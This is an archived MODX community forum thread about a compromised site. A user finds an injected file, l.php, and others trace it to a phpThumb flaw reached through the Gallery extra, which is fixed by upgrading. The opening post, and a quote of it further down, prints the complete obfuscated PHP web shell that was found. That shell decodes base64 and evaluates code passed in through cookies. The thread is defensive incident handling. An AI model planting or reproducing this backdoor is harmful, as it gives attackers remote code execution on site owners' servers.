We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

Answered modX Security issue

    • 41101
    • 40 Posts
    jonboy Reply #1, 10 years, 4 months ago
    Hello,

    I'm running Revo 2.2.7 with the security patch installed.

    Today I noticed in my assets folder there a was a directory with the name '.' inside. Within the . folder there was a file called l.php which had the following content

    <?php $knyl="chJGM9J2chNvdW50JzskYT0kX0NPT0tJRchTchtpchZichhyZXchNldCgkYSk9PSdzaScgJiYgJGMoJGEchpPjMpechyRr";$zzfo="PSdzYWochzcHduZCc7ZWNobyAnPCcuJGsuchJchz4nO2V2chYWwoYmFzZTY0X2RlY29kZShwcchmVnX3Jlcc";$lzcn="pvaW4oYXJychYXlfchc2xpYch2chUoJGEsJchGMoJGEpLTMpKSkpKTtlY2hvchICchc8LchycuJGsuJchz4nchO3ch0=";$rbyz = str_replace("u","","ustur_uruepuluauce");$ngnd="hGchxhY2UochYXJychYXkoJy9bXlchx3PVxzXSch8chnchLCcvXHMvchJyksIGFychcmF5KCcnLCcrJyksIchG";$sczz = $rbyz("v", "", "vbavsev64_vdevcvovdve");$qewo = $rbyz("j","","jcrjejajtej_jfjujncjtijojn");$tlbl = $qewo('', $sczz($rbyz("ch", "", $knyl.$zzfo.$ngnd.$lzcn))); $tlbl(); ?>


    This obviously appears to have been injected somehow.

    I've removed the offending folder and file but am trying to understand how it has been done.

    Anyone had anything similar? Is it a permissions issue?

    Thanks

    This question has been answered by multiple community members. See the first response.

    • discuss.answer
      • 3749
      • 24,544 Posts
      BobRay Reply #2, 10 years, 4 months ago
      The odds are that someone has either gained access to the server or guessed your password. It's possible, but very unlikely, that this is related to MODX security. If you've created any front-end forms that interact with the database of file system, that could also be a point of entry.

      The bad news is that the code you've found may have created one or more back doors to your site that removing it won't fix.

      The usual recommendation is situations like this is to change all your usernames and passwords (MODX, cPanel, DB, etc.), then wipe the site and restore from a backup made before the hack, then change all the usernames and passwords again.
        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
      • discuss.answer
        sottwell Reply #3, 10 years, 4 months ago
        And none of that will be of any use if your own computer has been taken over. You should check it with a good antivirus, and a firewall that reports any outgoing connections.
          Studying MODX in the desert - http://sottwell.com
          Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
          Join the Slack Community - http://modx.org
          • 41101
          • 40 Posts
          jonboy Reply #4, 10 years, 4 months ago
          Thanks for the replies.

          It's definitely not a virus on my Mac. I'll change the site usernames/passwords and do a clean install.

          Could it be done if the permission on my assets folder was inadvertently set to something like 777?

          I'll have a look through my log files and see if that gives any clues.

          Thanks
            • 44234
            • 219 Posts
            David Pede Reply #5, 10 years, 4 months ago
            Quote from: jonboy at Dec 10, 2013, 03:19 PM
            Hello,

            I'm running Revo 2.2.7 with the security patch installed.

            Today I noticed in my assets folder there a was a directory with the name '.' inside. Within the . folder there was a file called l.php which had the following content

            <!--?php $knyl="chJGM9J2chNvdW50JzskYT0kX0NPT0tJRchTchtpchZichhyZXchNldCgkYSk9PSdzaScgJiYgJGMoJGEchpPjMpechyRr";$zzfo="PSdzYWochzcHduZCc7ZWNobyAnPCcuJGsuchJchz4nO2V2chYWwoYmFzZTY0X2RlY29kZShwcchmVnX3Jlcc";$lzcn="pvaW4oYXJychYXlfchc2xpYch2chUoJGEsJchGMoJGEpLTMpKSkpKTtlY2hvchICchc8LchycuJGsuJchz4nchO3ch0=";$rbyz = str_replace("u","","ustur_uruepuluauce");$ngnd="hGchxhY2UochYXJychYXkoJy9bXlchx3PVxzXSch8chnchLCcvXHMvchJyksIGFychcmF5KCcnLCcrJyksIchG";$sczz = $rbyz("v", "", "vbavsev64_vdevcvovdve");$qewo = $rbyz("j","","jcrjejajtej_jfjujncjtijojn");$tlbl = $qewo('', $sczz($rbyz("ch", "", $knyl.$zzfo.$ngnd.$lzcn))); $tlbl(); ?-->


            This obviously appears to have been injected somehow.

            I've removed the offending folder and file but am trying to understand how it has been done.

            Anyone had anything similar? Is it a permissions issue?

            Thanks

            Ok I have found the exact same file on one of our Dev servers. Also found identical file here: /home/foo/public_html/assets/components/gallery/l.php.

            Running Revo 2.2.10-Advanced.

            I have also found an error_log file in the asset folder containing:
            [10-Dec-2013 15:18:35 Europe/London] PHP Warning:  chdir() [<a href='function.chdir'>function.chdir</a>]: No such file or directory (errno 2) in /home/foo/public_html/assets/components/gallery/l.php(1) : runtime-created function(1) : eval()'d code on line 1


            The modx error log had entries that reference gallery, phpThumb and imageMagick. These included urls to what looks like a compromised italian wordpress website.

            jonboy, did you have Gallery or Wordpress installed on your server?
              Find me on Twitter, GitHub or Google+
              • 44234
              • 219 Posts
              David Pede Reply #6, 10 years, 4 months ago
              After investigating this, I can confirm there is a vunerability with phpThumb. An attacker can use the Gallery Extra to create a malicious file on your server or download one from a seperate server.

              I think all versions of MODX Revo are affected, I have confirmed this hack with MODX 2.2.10 Advanced. I have emailed the Core team so they are aware of this.

              To fix this you must upgrade your phpThumb script from v1.7.9 to v1.7.11.

              I will not post the hack on the forum but please pm me if you wish to test your site.

                Find me on Twitter, GitHub or Google+
                • 41101
                • 40 Posts
                jonboy Reply #7, 10 years, 4 months ago
                Yes I do indeed use the Gallery addon.

                Thanks to both of you for posting your findings here.
                  • 44234
                  • 219 Posts
                  David Pede Reply #8, 10 years, 4 months ago
                  No problem.

                  Quote from: jonboy at Dec 23, 2013, 01:48 PM
                  Yes I do indeed use the Gallery addon.

                  If you haven't already then you must manually update the core phpThumb script now. Or uninstall gallery. I guarantee that is how they got in and even if you have clean restored your server/site the vunerability is still there.
                    Find me on Twitter, GitHub or Google+
                  • opengeek Reply #9, 10 years, 4 months ago
                    FYI, the phpthumb files in MODX core have been updated to those from version 1.7.11 (with a couple of additional obvious bug fixes) for MODX 2.2.11 (to be released shortly) at https://github.com/modxcms/revolution/commit/09e9db207fe83ec4d7fc9794527fd8b2e9aaa17d and for 2.3.x in the develop branch at https://github.com/modxcms/revolution/commit/d2d7e9d5ca636d325e54e5259350b3d7c9f2807e
                      Jason Coward
                      Chief Architect @ MODX
                      http://www.jasoncoward.com | http://twitter.com/drumshaman | https://github.com/opengeek
                      • 44661
                      • 31 Posts
                      justinet Reply #10, 10 years, 3 months ago
                      Quote from: davidpede at Dec 23, 2013, 05:56 PM

                      To fix this you must upgrade your phpThumb script from v1.7.9 to v1.7.11.
                      Hello,
                      Just checked the phpThumb files in my core Modx installation (core/model/phpthumb) as i am also using the Gallery extra and imageMagick, but havent seen any version number on those files ? How can you tell phpThumb version ?
                      On GitHub it's written JamesHeinrich phpThumb v1.7.11 was released on Aug 08, 2011, so would assume Modx revo recent versions (say 2.2.8 to 2.2.10) should use this latest phpThumb version ?? but of course need to ascertain this !
                      Thanks